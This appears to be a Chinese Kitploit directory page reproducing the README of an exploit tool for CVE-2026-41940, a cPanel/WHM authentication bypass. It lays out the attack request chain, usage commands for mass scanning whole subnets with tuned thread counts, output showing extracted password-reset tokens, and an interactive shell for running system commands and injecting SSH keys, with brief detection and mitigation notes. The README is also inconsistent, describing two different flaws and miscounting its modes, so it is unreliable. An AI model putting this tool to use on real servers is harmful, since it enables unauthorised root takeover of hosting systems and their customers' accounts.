Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-41940 — CVE-2026-41940 — cPanel/WHM认证绕过,作者Dr.Anach,`cpsrvd`基本认证处理程序中的CRLF注入 → 未认证的WHM API访问 → 以root身份执行RCE。自v11.40起所有cPanel版本受影响。 | Kitploit
工具/GitHubGitHub/anach-ai/cve-2026-41940
身份验证与授权权限提升漏洞分析漏洞利用横向移动Web应用程序漏洞利用后渗透利用渗透测试命令与控制红队
GitHubanach-ai/cve-2026-41940

CVE-2026-41940

43个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-41940 — cPanel/WHM认证绕过,作者Dr.Anach,`cpsrvd`基本认证处理程序中的CRLF注入 → 未认证的WHM API访问 → 以root身份执行RCE。自v11.40起所有cPanel版本受影响。

查看仓库

CVE-2026-41940 — cPanel/WHM 认证绕过

作者: Dr.Anach | 联系方式: @dranach | 许可证: MIT


概述

cpsrvd Basic 认证处理器中的 CRLF 注入 → 未认证的 WHM API 访问 → 以 root 身份远程执行代码。影响所有自 v11.40 以来的 cPanel 版本。

攻击链

#步骤请求
1创建会话GET /login/?user=root
2CRLF 注入Authorization: Basic <base64> — 密码携带 \r\n 载荷
3缓存提升GET /cpsess<ID>/login/?login_only=1
4执行GET /cpsess<ID>/execute/API/func

安装

root@kitploit:~
pip install requests colorama

以下是最终的 README.md — 用户友好、实用,专注于完成任务。


cPanel 认证绕过漏洞利用工具 — CVE-2026-41940

作者: Dr.Anach · Telegram: @dranach
版本: 2.0.0
许可证: 仅限授权安全测试


功能说明

利用 CVE-2026-41940,这是 cPanel & WHM(版本 11.x 至 106.x)中的一个认证绕过漏洞。该漏洞允许未认证的攻击者通过发送指向攻击者控制服务器的精心构造的 Host 头,访问受限制的端点——包括密码重置功能。

提供三种模式:

模式标志说明
单目标-t测试一个 IP 或域名
批量文件--batch从文件加载目标列表

安装

依赖

  • Python 3.7+(已在 Windows、Linux、macOS 上测试)
  • requests 库
root@kitploit:~
pip install requests

无其他依赖项。 CIDR 扩展使用 Python 内置的 ipaddress 模块——在 Windows 上无需额外安装。


快速开始

测试单个目标

root@kitploit:~
python main.py -t example.com
python main.py -t 192.168.1.100

测试目标列表(每行一个)

root@kitploit:~
python main.py --batch targets.txt --threads 50

targets.txt 格式:

root@kitploit:~
192.168.1.100
example.com
192.168.1.101
example.org
192.168.1.102

扫描整个子网(CIDR)

root@kitploit:~
python main.py --port-scan 192.168.128.0/18 --threads 100 --timeout 5

这将展开 192.168.128.0/18(16,384 个 IP),对每个 IP 进行快速端口检查,并仅对 端口 2087(cPanel/WHM)开放的主机尝试漏洞利用。


完整选项

root@kitploit:~
  -t, --target        Single target IP or domain
  --batch FILE        File with targets (one per line)
  --port-scan CIDR    CIDR range to scan (e.g., 192.168.128.0/18)
  -p, --port          Target port (default: 2087)
  --ssl               Use HTTPS (default: HTTP)
  --timeout SEC       Connection timeout in seconds (default: 10)
  --threads N         Max concurrent threads (default: 50)
  --proxy PROXY       HTTP proxy (e.g., http://127.0.0.1:8080)
  -v, --verbose       Verbose output with debug info
  --no-banner         Suppress banner
  --version           Show version

理解输出

root@kitploit:~
[+] 192.168.130.45:2087 — VULNERABLE!
    → Password reset URL: http://192.168.130.45:2087/reset?token=abc123
    → Response time: 1.23s

[-] 192.168.131.10:2087 — Not vulnerable
    → Reason: No password reset endpoint found

[!] 192.168.129.22:2087 — Error: Connection refused

结果以 JSON 格式保存,按主机组织,包含漏洞状态、提取的令牌和原始响应详细信息。


实用示例:在 Windows 上扫描 /18

您可能正是为此场景而来:

root@kitploit:~
python main.py --port-scan 192.168.128.0/18 -p 2087 --threads 100 --timeout 5 -v

工作原理:

  1. 展开 192.168.128.0/18 → 内部生成 16,384 个 IP
  2. 预过滤:对端口 2087 进行快速 TCP 连接扫描(跳过无响应的主机)
  3. 仅对端口开放的主机进行漏洞利用
  4. 报告存在漏洞的主机及其提取的重置令牌

线程提示:

  • --threads 100 效果良好(遵循默认套接字限制)
  • 如果连接良好,可提高至 --threads 200 以加快扫描
  • 如果遇到速率限制,请降低至 --threads 30 并增加 --timeout

CVSS 与风险

CVSS 9.1(严重) — 无需认证、无需用户交互、复杂度低。

影响

  • 任意 cPanel 账户的未授权密码重置
  • 完全账户接管
  • 在某些配置中从受限权限升级到管理员

补救措施

  • 将 cPanel/WHM 更新至最新修补版本
  • 在服务端验证 Host 头
  • 尽可能通过 IP 限制 WHM 访问

法律声明

此工具仅用于授权安全评估。测试前您必须拥有目标或获得所有者的书面许可。作者不对滥用承担任何责任。

交互式 Shell 命令

root@kitploit:~
help       Show commands
info       Server info
passwd     Change password
accounts   List cPanel accounts
enum       Full enumeration
shell      Execute system command
ssh-add    Inject SSH key
exec       Run Python one-liner
exit       Exit

检测

检查会话文件:

root@kitploit:~
ls -la /var/cpanel/sessions/raw/
ls -la /var/cpanel/sessions/cache/

/usr/local/cpanel/logs/access_log 中的可疑日志:

root@kitploit:~
/login/?user=root        → session mint
/login/?user=root        → CRLF injection
/cpsess*/login/?login_only=1  → cache promotion
/cpsess*/execute/*       → API abuse

缓解措施

root@kitploit:~
# 1. Patch to fixed build
# 2. Rotate all passwords and SSH keys
# 3. Purge sessions
rm -rf /var/cpanel/sessions/raw/*
rm -rf /var/cpanel/sessions/cache/*
systemctl restart cpanel

致谢

  • 漏洞发现者: Sina Kheirkhah / watchTowr Labs
  • 框架开发: Dr.Anach (@dranach)
下载工具
CIDR 扫描--port-scan展开子网并测试每个存活主机